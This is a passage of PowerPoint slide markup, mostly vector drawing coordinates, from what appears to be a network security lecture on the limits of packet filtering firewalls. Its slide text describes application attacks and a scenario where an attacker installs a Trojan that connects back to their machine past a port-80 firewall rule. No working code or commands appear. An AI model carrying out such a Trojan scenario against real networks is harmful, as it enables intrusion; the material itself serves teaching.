                    <a:pt x="695924" y="76597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690377" y="78288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687573" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="66815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712973" y="19783"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="687573" y="19783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690804" y="20297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690565" y="20297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710357" y="31794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="31794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="197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2" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{838385E5-843F-80FA-8316-A945DAADB172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69311" y="3392450"/>
              <a:ext cx="603854" cy="252007"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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52EF824C-82DA-EA8A-FD22-A0124348EE02}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3236480" y="2418079"/>
              <a:ext cx="3568700" cy="1398905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="942860" y="991120"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1016" y="913396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="925550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941844" y="1003274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942860" y="991120"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="1600758" y="998715"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1600682" y="986523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355318" y="988047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355394" y="1000239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600758" y="998715"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="3149422" y="10172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3142716" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2226780" y="601967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233485" y="612152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3149422" y="10172"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="3568217" y="1388173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2876321" y="987361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2870225" y="997902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3562121" y="1398714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568217" y="1388173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4" name="object 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772AF9DA-6BE2-43BE-5B68-2995175ECA23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92036" y="3604244"/>
              <a:ext cx="527308" cy="990595"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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43389FEB-CC23-457F-A027-31EB667DF96D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3254628" y="3241294"/>
              <a:ext cx="3556635" cy="726440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3556634" h="726439">
                  <a:moveTo>
                    <a:pt x="163830" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="120904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121031" y="284734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131699" y="213613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534664" y="725957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3556127" y="583565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153162" y="71119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638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904DF089-3895-1CFC-3AD4-E2A0F9411089}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3254628" y="3241294"/>
              <a:ext cx="3556635" cy="726440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3556634" h="726439">
                  <a:moveTo>
                    <a:pt x="0" y="120904"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="163830" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153162" y="71119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3556127" y="583565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534664" y="725957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131699" y="213613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121031" y="284734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120904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53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCFF4BA2-7050-B0E0-E206-324661B91D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231803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8" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2535DAE8-AADC-2A80-7423-93A1EA525D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231803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102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6817245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3EC56B5-9AA3-7CBE-A64A-EECAEC33CB38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25A879B-40DF-DF0C-8D5A-83EB4ADEC4C1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Packet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Filtering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vs.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Application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Attacks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BE5C421-E1F9-59C1-B0D4-69902E14FE4A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D9D16CF7-2424-8387-829A-F32AD669AC1A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103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2DF3A0F-C21C-3E51-A7DD-E5A45C16DC46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1556323"/>
            <a:ext cx="7145655" cy="2513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application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exploit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could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XSS,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buffer</a:t>
            </a:r>
            <a:endParaRPr sz="2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overflow,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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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injection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much,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much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more.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filtering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enough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stop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7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attacks.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Let’s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take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look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another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scenario.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887379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0FEF5945-D1AD-61F2-A403-9AD818E6CF9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498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861267C0-D2F8-508D-976B-040AFE0AD443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="114046"/>
            <a:ext cx="7936052" cy="737458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="288366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27455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lang="en-US" dirty="0"/>
              <a:t>9 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Filtering vs.</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Horse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C17150A-F2AF-DC2D-E5AD-BD691F47C695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4836078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42CB314-0FFD-0240-93AB-E2D317EB5B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4846724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104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0138504-ECB6-2775-9E8E-4AB049EC64E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474185" y="1929940"/>
            <a:ext cx="621030" cy="2310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4610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>EXAMPLE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F6713DB-08B1-8F7C-E2F5-CF02C1CA3F04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1653920" y="1677162"/>
            <a:ext cx="6743065" cy="23050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defPPr>
              <a:defRPr kern="0"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" marR="168910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hacker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manages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exploit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workstation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a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company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2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wants</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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install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Trojan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horse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remotely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manage</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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2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machine.</a:t>
            </a:r>
            <a:endParaRPr sz="2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2200">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc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Trojan,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default,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be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configured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spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>accept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connections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123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TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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UDP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2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spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>connect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back</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1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hacker's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machine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123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TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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UDP.</a:t>
            </a:r>
            <a:endParaRPr sz="22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3655182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65BF7D1-C586-4390-1143-79899B59AB29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850489D-B1D8-62CB-B422-E7D5E927022D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Packet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Filtering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vs.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Trojan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Horse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BF4A8CE-ADAF-1D07-F400-53B027B309EB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D1826FCB-6F02-5437-90DC-7D736465C0BE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105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730820E-B3B0-2AC9-D42A-DAADEDB3B8E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1813041"/>
            <a:ext cx="7743190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typical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firewall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configuration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rule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let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HTTP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traffic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(TCP.dst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=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80)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pass,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internal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workstations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browse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Internet.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remaining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traffic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dropped.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What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happens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Trojan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horse?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6163464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E578CC26-F882-72EB-AEFA-BE526330BFB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="796886" y="2117759"/>
            <a:ext cx="7776150" cy="2717800"/>
            <a:chOff x="675131" y="2116881"/>
            <a:chExt cx="7776150" cy="2717800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8C25C7EE-F74B-CAD1-1ABD-8F253680848C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5077206" y="3292602"/>
              <a:ext cx="2304415" cy="216535"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2304415" h="216535">
                  <a:moveTo>
                    <a:pt x="108204" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="108204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108204" y="216408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108204" y="162306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2304288" y="162306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2304288" y="54102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108204" y="54102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09667E46-454E-C883-F9D1-D510E0191CA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5077206" y="3292602"/>
              <a:ext cx="2304415" cy="216535"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2304415" h="216535">
                  <a:moveTo>
                    <a:pt x="0" y="108204"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108204" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108204" y="54102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2304288" y="54102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2304288" y="162306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108204" y="162306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108204" y="216408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="108204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0835B116-0F4D-A75E-D91C-B1F05C4C97BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="704620" y="2144730"/>
              <a:ext cx="4138929" cy="2660650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4138929" h="2660650">
                  <a:moveTo>
                    <a:pt x="1734987" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1607198" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1538388" y="9834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469578" y="29504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1440088" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1405684" y="49174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312299" y="93431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253319" y="132770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1179595" y="191780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130445" y="240954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110785" y="270459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091125" y="295046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071465" y="324550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056720" y="349138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1041975" y="378642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022315" y="408147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012485" y="442569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992825" y="501578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982995" y="536000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978080" y="565505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968250" y="634349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968250" y="722863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938761" y="727780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="904356" y="732698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874866" y="742533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840461" y="752368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815886" y="767120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786396" y="786790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761821" y="801542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697927" y="875304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653692" y="958900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643862" y="1017909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638947" y="1057249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643862" y="1076919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643862" y="1106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609457" y="1096588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570137" y="1086753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530817" y="1081836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496412" y="1081836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442348" y="1086753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393198" y="1091671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344048" y="1106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299813" y="1121176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255578" y="1140845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176939" y="1190020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142534" y="1219524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108129" y="1253946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83554" y="1288368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34404" y="1367047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19659" y="1411304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1499818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1598167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19659" y="1686681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34404" y="1730938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83554" y="1809617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108129" y="1844039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142534" y="1878461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176939" y="1907966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216259" y="1932553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255578" y="1962058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299813" y="1976810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344048" y="1996480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393198" y="2006314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442348" y="2011232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496412" y="2016149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525902" y="2016149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560307" y="2011232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560307" y="2055489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565222" y="2084993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565222" y="2114498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575052" y="2144003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579967" y="2168590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599627" y="2227599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614372" y="2252186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629117" y="2281691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702842" y="2380040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771651" y="2443967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="820801" y="2483306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874866" y="2517728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933846" y="2547233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="997740" y="2571820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061635" y="2591490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130445" y="2606242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169765" y="2611159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204169" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238574" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277894" y="2620994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317214" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356534" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435173" y="2606242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474493" y="2596407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543303" y="2576737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582623" y="2566902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1612113" y="2552150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1646518" y="2532480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676007" y="2517728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705497" y="2498058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739902" y="2478389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764477" y="2458719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793967" y="2439049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818542" y="2414462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838202" y="2439049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1862777" y="2468554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887352" y="2488223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916841" y="2512811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1946331" y="2532480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1975821" y="2557068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010226" y="2571820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2049546" y="2591490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088866" y="2606242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128186" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172420" y="2630829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2260890" y="2650499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2305125" y="2655416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2349360" y="2655416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2398509" y="2660334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462404" y="2655416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521384" y="2650499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2580364" y="2640664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639343" y="2625912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2688493" y="2611159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2742558" y="2591490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2786793" y="2571820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835943" y="2547233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2875262" y="2522646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2909667" y="2488223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944072" y="2458719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2973562" y="2429214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2998137" y="2389875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027627" y="2316113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3037457" y="2276774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3062032" y="2281691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081691" y="2286608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3165246" y="2286608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3194736" y="2281691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3229141" y="2276774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3258631" y="2266939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288121" y="2252186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3337270" y="2222682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3356930" y="2198095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381505" y="2178425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401165" y="2158755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3415910" y="2134168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3425740" y="2104663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3440485" y="2080076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3450315" y="2050571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="2021067"/>
                  </a:lnTo>
                  <a:lnTo>
